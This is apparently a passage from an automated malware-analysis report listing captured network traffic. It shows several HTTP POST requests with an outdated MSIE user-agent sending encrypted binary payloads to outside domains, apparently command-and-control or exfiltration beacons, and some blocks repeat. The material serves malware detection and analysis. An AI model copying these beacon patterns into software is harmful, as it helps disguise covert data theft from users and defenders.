65 67 73 66 57 4e 49 52 67 79 68 30 59 6c 6b 63 49 59 4d 4a 31 4c 51 61 38 4c 6b 36 77 48 32 48 4b 53 63 6b 59 77 46 68 47 70 79 4d 6c 55 42 4f 4e 34 30 64 7a 6a 6c 43 71 52 4e 70 73 4c 51 75 6a 31 79 6b 64 5a 50 75 36 2b 39 62 66 44 65 65 67 74 59 4c 6d 58 42 42 2f 4f 66 70 67 31 75 4f 44 79 62 32 4b 70 58 41 51 73 46 35 74 30 43 53 61 71 38 73 61 48 45 6c 36 48 62 56 65 69 77 6d 74 57 42 53 78 34 41 47 32 51 61 54 5a 72 61 35 66 71 66 53 37 49 48 6b 49 62 57 6a 5a 4c 4f 78 34 6b 70 49 47 63 37 71 59 7a 66 69 4f 65 6f 6b 7a 6b 53 64 34 33 4a 6b 58 43 2f 64 5a 7a 4e 34 67 4f 58 5a 43 44 49 70 32 44 76 48 68 69 6d 4b 79 46 43 56 41 6a 38 76 6e 4a 46 39 4d 59 6d 6a 2b 37 52 44 42 30 6e 51 58 35 74 51 78 47 46 61 52 36 75 52 35 48 2b 6b 38 45 32 58 71 6f 49 77 65 51 77 61 4a 42 68 45 2b 6e 52 6f 51 6e 6a 76 38 78 6d 76 4c 7a 37 4e 4c 6f 54 54 58 55 4d 56 4c 6a 4c 65 4d 78 35 75 63 32 6d 64 43 56 53 51 65 37 4b 7a 32 36 30 5a 31 37 70 33 35 67 72 52 43 56 38 32 4f 6d 67 65 69 52 58 57 61 6c 5a 51 39 68 65 31 52 35 56 69 33 35 5a 64 6a 51 62 62 55 42 72 67 65 37 58 77 6c 44 74 74 79 66 4d 50 43 72 37 67 56 77 31 38 45 72 43 39 39 2f 51 3d Data Ascii: e52e2ewhZ5Tr8sEY17Q7Lf9fNu9EhXI54NmLHV6Fu0V1JlhOWk7D8K96pCNuRnuF8Gl741o4OSC3GcYs8zGxeo9hAASIMfdUvJBGFAzRf/BEO0mYheEh4W0RZWCHcisTq832inh21MZXLXp6ZXJDoi5yBHn/1zuViiwlegsfWNIRgyh0YlkcIYMJ1LQa8Lk6wH2HKSckYwFhGpyMlUBON40dzjlCqRNpsLQuj1ykdZPu6+9bfDeegtYLmXBB/Ofpg1uODyb2KpXAQsF5t0CSaq8saHEl6HbVeiwmtWBSx4AG2QaTZra5fqfS7IHkIbWjZLOx4kpIGc7qYzfiOeokzkSd43JkXC/dZzN4gOXZCDIp2DvHhimKyFCVAj8vnJF9MYmj+7RDB0nQX5tQxGFaR6uR5H+k8E2XqoIweQwaJBhE+nRoQnjv8xmvLz7NLoTTXUMVLjLeMx5uc2mdCVSQe7Kz260Z17p35grRCV82OmgeiRXWalZQ9he1R5Vi35ZdjQbbUBrge7XwlDttyfMPCr7gVw18ErC99/Q=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 65 79 4d 57 31 4f 49 30 69 4a 53 65 55 51 7a 6d 56 61 35 39 4e 6d 56 49 72 43 64 79 2b 70 59 70 4e 70 47 70 70 4d 54 75 35 59 59 2b 79 66 61 79 4d 7a 76 5a 72 73 33 7a 7a 43 6e 74 58 44 77 4f 73 73 75 45 61 58 67 49 63 71 78 2f 45 76 4b 37 30 55 6a 2f 6b 64 73 64 50 52 2b 67 48 56 79 70 52 43 67 4f 36 72 6c 52 44 69 55 47 54 42 49 5a 2f 6d 77 45 4c 47 33 48 6f 4d 2f 45 66 56 33 75 6a 37 67 71 2b 30 72 6e 67 30 61 55 4a 54 62 59 69 78 52 54 44 78 49 39 4e 43 73 78 44 68 4b 2b 42 71 72 48 66 4e 62 51 4f 6a 55 45 6c 38 58 37 51 66 56 5a 4e 5a 43 4c 47 4c 74 63 58 4a 33 44 55 6a 50 75 55 31 7a 6d 6a 32 58 57 48 69 4c 4f 32 71 78 4c 4f 4b 5a 73 4b 63 68 34 51 2b 4a 33 79 77 74 44 39 39 49 2f 64 6e 5a 37 63 2b 38 51 46 77 70 70 62 4a 32 32 50 31 6c 58 72 55 49 4f 73 42 43 76 56 75 32 63 7a 4e 57 57 31 41 6b 4b 6b 56 68 37 41 6e 6e 78 68 51 33 4d 62 55 55 4f 65 65 38 47 6d 58 77 6a 51 68 2b 39 69 4c 32 58 54 57 56 74 4a 64 4c 2b 77 4c 76 62 39 4a 59 7a 35 47 66 61 4b 4c 4d 77 33 49 42 31 58 65 74 5a 45 6f 4c 4d 59 73 36 6c 64 41 4a 4f 4b 79 67 6b 48 47 73 53 6c 38 2f 35 70 6b 33 30 32 4c 55 51 4b 5a 52 4b 76 54 68 34 64 67 73 36 52 31 43 79 44 32 50 44 6b 6c 44 2b 69 39 61 4f 58 6e 4f 31 62 47 38 45 50 54 55 31 41 2f 41 35 73 68 2f 57 52 6d 4c 46 51 33 32 48 4e 31 79 67 33 62 56 4e 6b 6d 44 38 6b 78 61 6c 51 52 51 49 69 5a 6c 2f 34 79 74 71 45 78 37 76 43 44 33 55 66 51 71 47 47 49 32 72 59 49 45 41 50 73 42 79 48 49 6a 6a 34 6d 76 36 74 43 7a 6b 30 44 35 2f 6a 57 33 4a 43 48 5a 63 4a 52 49 4c 74 4d 78 63 47 36 4c 37 74 6f 52 72 77 47 48 77 6b 4d 58 5a 77 6c 48 73 6e 50 4b 6d 74 53 72 2f 43 48 63 32 36 46 45 3d Data Ascii: eyMW1OI0iJSeUQzmVa59NmVIrCdy+pYpNpGppMTu5YY+yfayMzvZrs3zzCntXDwOssuEaXgIcqx/EvK70Uj/kdsdPR+gHVypRCgO6rlRDiUGTBIZ/mwELG3HoM/EfV3uj7gq+0rng0aUJTbYixRTDxI9NCsxDhK+BqrHfNbQOjUEl8X7QfVZNZCLGLtcXJ3DUjPuU1zmj2XWHiLO2qxLOKZsKch4Q+J3ywtD99I/dnZ7c+8QFwppbJ22P1lXrUIOsBCvVu2czNWW1AkKkVh7AnnxhQ3MbUUOee8GmXwjQh+9iL2XTWVtJdL+wLvb9JYz5GfaKLMw3IB1XetZEoLMYs6ldAJOKygkHGsSl8/5pk302LUQKZRKvTh4dgs6R1CyD2PDklD+i9aOXnO1bG8EPTU1A/A5sh/WRmLFQ32HN1yg3bVNkmD8kxalQRQIiZl/4ytqEx7vCD3UfQqGGI2rYIEAPsByHIjj4mv6tCzk0D5/jW3JCHZcJRILtMxcG6L7toRrwGHwkMXZwlHsnPKmtSr/CHc26FE=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 73 2b 64 46 46 59 63 43 67 70 53 76 58 63 56 57 74 74 34 35 30 31 42 61 6c 4c 68 39 33 52 42 58 71 7a 61 7a 43 66 33 70 51 69 76 44 2b 67 4f 34 56 65 68 5a 7a 75 63 33 46 59 6a 59 65 42 31 4e 52 6a 4d 47 61 64 44 45 69 50 59 62 72 6b 6e 63 6c 36 4c 57 69 48 56 54 45 45 30 62 4e 37 63 5a 65 48 4c 75 71 32 45 61 63 57 7a 48 52 7a 68 73 66 67 6d 31 78 70 6e 77 77 67 30 41 59 49 4c 73 50 30 38 34 56 56 6b 74 69 66 31 6c 50 4c 4b 4a 47 77 34 32 6e 51 6c 6c 75 71 5a 68 35 43 72 2f 48 31 63 78 35 46 44 79 6a 48 78 6f 64 59 38 67 63 41 73 49 64 5a 64 72 4f 34 64 37 59 50 4c 71 37 6d 2b 76 59 55 2b 70 50 52 77 68 72 4e 67 58 73 34 41 62 6a 42 31 45 66 63 56 62 63 6d 55 66 6f 36 36 70 46 73 35 5a 55 75 5a 75 35 57 32 33 43 32 41 73 76 6a 30 64 77 52 62 74 54 76 57 71 4b 75 6f 4d 58 72 61 73 4c 6d 6c 36 66 4f 64 36 43 6b 45 53 7a 70 64 37 39 33 50 70 44 6d 56 78 56 48 33 48 70 6e 6a 5a 42 49 34 6d 54 4b 38 64 53 6c 47 36 43 64 67 47 34 39 31 52 33 59 4a 72 63 50 58 61 73 78 70 37 37 39 59 77 75 42 63 56 51 50 52 6d 52 63 59 4c 58 45 58 51 6c 62 5a 69 79 66 43 44 7a 68 4d 6d 55 65 4a 2b 59 4d 5a 37 4a 43 51 54 2f 49 61 4a 74 30 37 49 36 48 37 66 52 4c 33 32 4e 66 74 6c 33 2b 41 63 74 71 68 48 53 68 6b 54 66 65 79 56 50 4b 71 51 6b 77 4c 78 72 74 57 6f 72 43 76 4c 72 32 4f 74 46 46 46 62 62 39 2b 36 49 74 44 75 47 70 44 56 7a 34 4b 2f 32 64 36 39 66 65 48 5a 41 4a 6b 4a 38 6a 54 51 32 37 77 6a 30 65 6c 4a 44 61 76 63 62 39 6a 46 55 58 32 79 75 2f 4d 79 46 73 48 4d 6f 78 6d 6f 55 4e 47 79 37 43 32 65 74 33 78 77 50 33 65 6d 52 77 53 42 6c 4b 76 6d 6a 46 75 46 30 45 79 6d 62 56 7a 72 72 42 6e 74 53 75 33 61 54 63 56 37 67 50 4c 69 59 6a 41 3d Data Ascii: s+dFFYcCgpSvXcVWtt4501BalLh93RBXqzazCf3pQivD+gO4VehZzuc3FYjYeB1NRjMGadDEiPYbrkncl6LWiHVTEE0bN7cZeHLuq2EacWzHRzhsfgm1xpnwwg0AYILsP084VVktif1lPLKJGw42nQlluqZh5Cr/H1cx5FDyjHxodY8gcAsIdZdrO4d7YPLq7m+vYU+pPRwhrNgXs4AbjB1EfcVbcmUfo66pFs5ZUuZu5W23C2Asvj0dwRbtTvWqKuoMXrasLml6fOd6CkESzpd793PpDmVxVH3HpnjZBI4mTK8dSlG6CdgG491R3YJrcPXasxp779YwuBcVQPRmRcYLXEXQlbZiyfCDzhMmUeJ+YMZ7JCQT/IaJt07I6H7fRL32Nftl3+ActqhHShkTfeyVPKqQkwLxrtWorCvLr2OtFFFbb9+6ItDuGpDVz4K/2d69feHZAJkJ8jTQ27wj0elJDavcb9jFUX2yu/MyFsHMoxmoUNGy7C2et3xwP3emRwSBlKvmjFuF0EymbVzrrBntSu3aTcV7gPLiYjA=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 77 43 31 4a 37 42 4c 2b 69 4a 53 38 46 49 7a 59 78 51 5a 68 4c 42 56 5a 2f 73 4a 69 34 35 64 67 5a 74 31 56 49 6c 49 46 42 66 33 45 57 52 7a 67 7a 69 64 76 4e 78 38 42 52 5a 2b 55 38 58 2f 65 74 37 4d 64 38 67 34 58 32 6b 38 44 2f 30 38 65 57 79 46 54 38 48 31 63 6f 2f 4e 31 45 34 70 57 6b 76 65 79 50 38 4a 79 52 37 41 62 34 2f 6b 32 71 61 66 73 78 66 34 55 7a 53 35 76 7a 56 33 62 78 6c 72 53 44 6e 50 4d 32 7a 2f 56 69 30 71 33 78 72 49 67 39 63 4d 6e 77 30 41 4f 4c 4d 53 31 35 51 2f 64 54 74 63 6f 64 45 66 4a 72 6f 44 78 65 43 63 64 61 6c 6d 5a 50 57 70 53 6b 53 48 32 7a 7a 41 62 73 6a 6e 49 55 32 55 71 32 49 35 72 6f 37 41 4b 6a 6c 30 6a 70 2b 78 50 66 30 34 30 44 63 32 42 46 72 72 69 4b 79 58 4d 42 63 37 4b 31 43 53 56 34 38 67 4b 6c 71 7a 4c 55 53 5a 65 2f 44 57 38 4b 68 41 57 54 7a 47 70 62 58 6a 36 33 6d 66 74 6a 2b 4a 7a 74 4a 61 34 42 5a 51 45 43 74 65 46 30 55 7a 42 31 42 49 65 38 56 76 53 31 7a 67 71 78 64 2f 51 61 77 6c 69 67 75 79 38 45 41 37 6b 4a 46 70 32 42 72 6c 54 49 7a 50 70 43 7a 2f 4d 63 77 7a 52 35 6d 49 4c 62 61 57 53 5a 38 61 36 56 4c 6a 6d 6b 36 50 2b 68 71 72 32 42 47 75 70 48 45 6a 4d 79 54 42 62 67 57 6d 4d 39 56 36 43 6f 44 51 31 44 67 34 66 63 47 4e 67 35 32 66 42 48 63 31 70 54 2f 4e 59 58 66 30 6b 57 69 42 6d 52 6f 76 44 38 4f 31 53 61 5a 6c 67 65 79 38 49 75 35 7a 76 63 6e 2b 61 78 57 43 39 2b 74 47 68 2f 4b 55 48 2f 57 63 68 58 6d 64 7a 56 71 4f 46 4f 73 6a 75 34 6e 2f 73 36 69 74 69 32 78 32 56 4d 61 4f 79 4a 41 56 64 31 4d 6d 49 4b 4c 68 62 4e 30 64 67 39 46 45 4f 58 6d 55 51 73 4c 6c 50 55 57 7a 38 63 41 52 61 4e 6a 4a 50 6e 4a 59 45 6e 32 6c 69 66 2b 2b 4c 67 41 47 58 77 4f 64 44 36 56 79 4c 48 6b 51 69 73 32 41 34 7a 74 42 71 31 6f 37 65 Data Ascii: wC1J7BL+iJS8FIzYxQZhLBVZ/sJi45dgZt1VIlIFBf3EWRzgzidvNx8BRZ+U8X/et7Md8g4X2k8D/08eWyFT8H1co/N1E4pWkveyP8JyR7Ab4/k2qafsxf4UzS5vzV3bxlrSDnPM2z/Vi0q3xrIg9cMnw0AOLMS15Q/dTtcodEfJroDxeCcdalmZPWpSkSH2zzAbsjnIU2Uq2I5ro7AKjl0jp+xPf040Dc2BFrriKyXMBc7K1CSV48gKlqzLUSZe/DW8KhAWTzGpbXj63mftj+JztJa4BZQECteF0UzB1BIe8VvS1zgqxd/Qawliguy8EA7kJFp2BrlTIzPpCz/McwzR5mILbaWSZ8a6VLjmk6P+hqr2BGupHEjMyTBbgWmM9V6CoDQ1Dg4fcGNg52fBHc1pT/NYXf0kWiBmRovD8O1SaZlgey8Iu5zvcn+axWC9+tGh/KUH/WchXmdzVqOFOsju4n/s6iti2x2VMaOyJAVd1MmIKLhbN0dg9FEOXmUQsLlPUWz8cARaNjJPnJYEn2lif++LgAGXwOdD6VyLHkQis2A4ztBq1o7e
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 65 79 4d 57 31 4f 49 30 69 4a 53 65 55 51 7a 6d 56 61 35 39 4e 6d 56 49 72 43 64 79 2b 70 59 70 4e 70 47 70 70 4d 54 75 35 59 59 2b 79 66 61 79 4d 7a 76 5a 72 73 33 7a 7a 43 6e 74 58 44 77 4f 73 73 75 45 61 58 67 49 63 71 78 2f 45 76 4b 37 30 55 6a 2f 6b 64 73 64 50 52 2b 67 48 56 79 70 52 43 67 4f 36 72 6c 52 44 69 55 47 54 42 49 5a 2f 6d 77 45 4c 47 33 48 6f 4d 2f 45 66 56 33 75 6a 37 67 71 2b 30 72 6e 67 30 61 55 4a 54 62 59 69 78 52 54 44 78 49 39 4e 43 73 78 44 68 4b 2b 42 71 72 48 66 4e 62 51 4f 6a 55 45 6c 38 58 37 51 66 56 5a 4e 5a 43 4c 47 4c 74 63 58 4a 33 44 55 6a 50 75 55 31 7a 6d 6a 32 58 57 48 69 4c 4f 32 71 78 4c 4f 4b 5a 73 4b 63 68 34 51 2b 4a 33 79 77 74 44 39 39 49 2f 64 6e 5a 37 63 2b 38 51 46 77 70 70 62 4a 32 32 50 31 6c 58 72 55 49 4f 73 42 43 76 56 75 32 63 7a 4e 57 57 31 41 6b 4b 6b 56 68 37 41 6e 6e 78 68 51 33 4d 62 55 55 4f 65 65 38 47 6d 58 77 6a 51 68 2b 39 69 4c 32 58 54 57 56 74 4a 64 4c 2b 77 4c 76 62 39 4a 59 7a 35 47 66 61 4b 4c 4d 77 33 49 42 31 58 65 74 5a 45 6f 4c 4d 59 73 36 6c 64 41 4a 4f 4b 79 67 6b 48 47 73 53 6c 38 2f 35 70 6b 33 30 32 4c 55 51 4b 5a 52 4b 76 54 68 34 64 67 73 36 52 31 43 79 44 32 50 44 6b 6c 44 2b 69 39 61 4f 58 6e 4f 31 62 47 38 45 50 54 55 31 41 2f 41 35 73 68 2f 57 52 6d 4c 46 51 33 32 48 4e 31 79 67 33 62 56 4e 6b 6d 44 38 6b 78 61 6c 51 52 51 49 69 5a 6c 2f 34 79 74 71 45 78 37 76 43 44 33 55 66 51 71 47 47 49 32 72 59 49 45 41 50 73 42 79 48 49 6a 6a 34 6d 76 36 74 43 7a 6b 30 44 35 2f 6a 57 33 4a 43 48 5a 63 4a 52 49 4c 74 4d 78 63 47 36 4c 37 74 6f 52 72 77 47 48 77 6b 4d 58 5a 77 6c 48 73 6e 50 4b 6d 74 53 72 2f 43 48 63 32 36 46 45 3d Data Ascii: eyMW1OI0iJSeUQzmVa59NmVIrCdy+pYpNpGppMTu5YY+yfayMzvZrs3zzCntXDwOssuEaXgIcqx/EvK70Uj/kdsdPR+gHVypRCgO6rlRDiUGTBIZ/mwELG3HoM/EfV3uj7gq+0rng0aUJTbYixRTDxI9NCsxDhK+BqrHfNbQOjUEl8X7QfVZNZCLGLtcXJ3DUjPuU1zmj2XWHiLO2qxLOKZsKch4Q+J3ywtD99I/dnZ7c+8QFwppbJ22P1lXrUIOsBCvVu2czNWW1AkKkVh7AnnxhQ3MbUUOee8GmXwjQh+9iL2XTWVtJdL+wLvb9JYz5GfaKLMw3IB1XetZEoLMYs6ldAJOKygkHGsSl8/5pk302LUQKZRKvTh4dgs6R1CyD2PDklD+i9aOXnO1bG8EPTU1A/A5sh/WRmLFQ32HN1yg3bVNkmD8kxalQRQIiZl/4ytqEx7vCD3UfQqGGI2rYIEAPsByHIjj4mv6tCzk0D5/jW3JCHZcJRILtMxcG6L7toRrwGHwkMXZwlHsnPKmtSr/CHc26FE=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWlFQcTllMUhuNGtUcTMtXzF3WXVEZ0FBQUR3IiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaUVBxOWUxSG40a1RxMy1fMXdZdURnQUFBRHciLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU3NiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiMTkxLjk2LjE1MC4yMDkiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjIwNDIyIiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5NDc1NTU3My4yODU0MDMsIlJFUVVFU1RfVElNRSI6MTY5NDc1NTU3MywiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6IjE5MS45Ni4xNTAuMjA5In0%3D
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 65 79 4d 57 31 4f 49 30 69 4a 53 65 55 51 7a 6d 56 61 35 39 4e 6d 56 49 72 43 64 79 2b 70 59 70 4e 70 47 70 70 4d 54 75 35 59 59 2b 79 66 61 79 4d 7a 76 5a 72 73 33 7a 7a 43 6e 74 58 44 77 4f 73 73 75 45 61 58 67 49 63 71 78 2f 45 76 4b 37 30 55 6a 2f 6b 64 73 64 50 52 2b 67 48 56 79 70 52 43 67 4f 36 72 6c 52 44 69 55 47 54 42 49 5a 2f 6d 77 45 4c 47 33 48 6f 4d 2f 45 66 56 33 75 6a 37 67 71 2b 30 72 6e 67 30 61 55 4a 54 62 59 69 78 52 54 44 78 49 39 4e 43 73 78 44 68 4b 2b 42 71 72 48 66 4e 62 51 4f 6a 55 45 6c 38 58 37 51 66 56 5a 4e 5a 43 4c 47 4c 74 63 58 4a 33 44 55 6a 50 75 55 31 7a 6d 6a 32 58 57 48 69 4c 4f 32 71 78 4c 4f 4b 5a 73 4b 63 68 34 51 2b 4a 33 79 77 74 44 39 39 49 2f 64 6e 5a 37 63 2b 38 51 46 77 70 70 62 4a 32 32 50 31 6c 58 72 55 49 4f 73 42 43 76 56 75 32 63 7a 4e 57 57 31 41 6b 4b 6b 56 68 37 41 6e 6e 78 68 51 33 4d 62 55 55 4f 65 65 38 47 6d 58 77 6a 51 68 2b 39 69 4c 32 58 54 57 56 74 4a 64 4c 2b 77 4c 76 62 39 4a 59 7a 35 47 66 61 4b 4c 4d 77 33 49 42 31 58 65 74 5a 45 6f 4c 4d 59 73 36 6c 64 41 4a 4f 4b 79 67 6b 48 47 73 53 6c 38 2f 35 70 6b 33 30 32 4c 55 51 4b 5a 52 4b 76 54 68 34 64 67 73 36 52 31 43 79 44 32 50 44 6b 6c 44 2b 69 39 61 4f 58 6e 4f 31 62 47 38 45 50 54 55 31 41 2f 41 35 73 68 2f 57 52 6d 4c 46 51 33 32 48 4e 31 79 67 33 62 56 4e 6b 6d 44 38 6b 78 61 6c 51 52 51 49 69 5a 6c 2f 34 79 74 71 45 78 37 76 43 44 33 55 66 51 71 47 47 49 32 72 59 49 45 41 50 73 42 79 48 49 6a 6a 34 6d 76 36 74 43 7a 6b 30 44 35 2f 6a 57 33 4a 43 48 5a 63 4a 52 49 4c 74 4d 78 63 47 36 4c 37 74 6f 52 72 77 47 48 77 6b 4d 58 5a 77 6c 48 73 6e 50 4b 6d 74 53 72 2f 43 48 63 32 36 46 45 3d Data Ascii: eyMW1OI0iJSeUQzmVa59NmVIrCdy+pYpNpGppMTu5YY+yfayMzvZrs3zzCntXDwOssuEaXgIcqx/EvK70Uj/kdsdPR+gHVypRCgO6rlRDiUGTBIZ/mwELG3HoM/EfV3uj7gq+0rng0aUJTbYixRTDxI9NCsxDhK+BqrHfNbQOjUEl8X7QfVZNZCLGLtcXJ3DUjPuU1zmj2XWHiLO2qxLOKZsKch4Q+J3ywtD99I/dnZ7c+8QFwppbJ22P1lXrUIOsBCvVu2czNWW1AkKkVh7AnnxhQ3MbUUOee8GmXwjQh+9iL2XTWVtJdL+wLvb9JYz5GfaKLMw3IB1XetZEoLMYs6ldAJOKygkHGsSl8/5pk302LUQKZRKvTh4dgs6R1CyD2PDklD+i9aOXnO1bG8EPTU1A/A5sh/WRmLFQ32HN1yg3bVNkmD8kxalQRQIiZl/4ytqEx7vCD3UfQqGGI2rYIEAPsByHIjj4mv6tCzk0D5/jW3JCHZcJRILtMxcG6L7toRrwGHwkMXZwlHsnPKmtSr/CHc26FE=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheCookie: snkz=191.96.150.209; btst=179af1c99b99e03c4cb38fd6cbcfb839|191.96.150.209|1694755610|1694755593|8|2|0Data Raw: 58 46 63 31 6d 61 4b 62 6a 70 51 52 74 50 56 51 46 57 61 42 7a 43 55 64 30 7a 49 79 69 42 50 36 39 67 50 41 76 2f 6b 48 54 4b 76 37 53 77 45 30 64 6e 57 34 44 70 62 4d 66 66 6d 67 46 63 71 32 62 6d 76 39 64 55 36 48 58 2b 34 46 51 59 33 4c 74 55 63 75 75 4f 5a 66 54 4b 50 4c 58 4a 76 74 78 5a 4f 6f 6d 35 42 4e 4a 47 77 57 69 72 59 54 38 54 35 55 55 67 57 4c 46 6d 78 37 34 33 50 79 39 34 51 57 44 58 52 38 6a 45 63 56 46 41 79 35 38 35 47 7a 62 50 71 45 6c 48 44 70 79 6a 33 42 38 45 59 4c 74 54 58 5a 72 45 65 68 69 49 52 50 74 7a 77 43 6f 4d 72 45 65 33 65 57 6a 4b 61 74 4e 78 51 67 48 41 70 49 55 56 53 36 33 50 2f 48 4d 4e 54 67 64 66 4f 77 64 4e 59 45 37 5a 41 42 43 78 42 5a 2b 6f 68 34 64 48 6d 64 66 5a 72 77 51 46 48 55 35 64 49 47 46 57 70 6f 62 38 4e 63 33 34 64 50 67 50 47 6e 43 41 39 61 66 77 38 6c 6c 52 51 49 4a 7a 48 4d 4b 62 4e 73 35 4d 34 78 70 6e 6e 45 6e 6c 75 56 67 72 45 51 45 67 6d 66 54 33 34 69 57 63 34 56 62 43 42 53 36 63 42 6d 47 38 6f 58 51 43 39 57 37 66 6a 2f 39 35 63 50 66 66 31 46 44 50 4c 6c 35 72 2f 48 54 59 59 48 4f 7a 33 52 76 58 56 52 70 31 63 66 47 72 37 31 71 77 6b 6f 4f 4e 70 47 7a 69 50 54 2b 36 79 78 6e 76 5a 4b 44 70 4d 66 43 52 73 4e 5a 44 70 72 6e 4a 4a 47 37 52 77 7a 71 75 57 38 45 4d 32 6e 67 65 36 56 78 76 35 49 48 2b 43 6b 36 53 62 76 73 41 31 56 63 52 34 55 38 6b 2f 4c 49 48 67 4b 57 73 4e 58 45 48 67 77 6c 7a 75 71 34 32 5a 5a 65 42 39 78 37 74 73 52 54 48 41 76 38 47 7a 51 38 44 4e 4a 50 51 42 33 6b 50 49 69 7a 41 55 75 31 51 74 38 55 33 34 32 67 56 65 75 58 2b 61 78 42 48 37 30 38 4a 75 67 36 45 75 48 43 57 53 57 44 6e 6a 6c 48 7a 4e 57 68 5a 4e 72 4e 77 3d 3d Data Ascii: XFc1maKbjpQRtPVQFWaBzCUd0zIyiBP69gPAv/kHTKv7SwE0dnW4DpbMffmgFcq2bmv9dU6HX+4FQY3LtUcuuOZfTKPLXJvtxZOom5BNJGwWirYT8T5UUgWLFmx743Py94QWDXR8jEcVFAy585GzbPqElHDpyj3B8EYLtTXZrEehiIRPtzwCoMrEe3eWjKatNxQgHApIUVS63P/HMNTgdfOwdNYE7ZABCxBZ+oh4dHmdfZrwQFHU5dIGFWpob8Nc34dPgPGnCA9afw8llRQIJzHMKbNs5M4xpnnEnluVgrEQEgmfT34iWc4VbCBS6cBmG8oXQC9W7fj/95cPff1FDPLl5r/HTYYHOz3RvXVRp1cfGr71qwkoONpGziPT+6yxnvZKDpMfCRsNZDprnJJG7RwzquW8EM2nge6Vxv5IH+Ck6SbvsA1VcR4U8k/LIHgKWsNXEHgwlzuq42ZZeB9x7tsRTHAv8GzQ8DNJPQB3kPIizAUu1Qt8U342gVeuX+axBH708Jug6EuHCWSWDnjlHzNWhZNrNw==
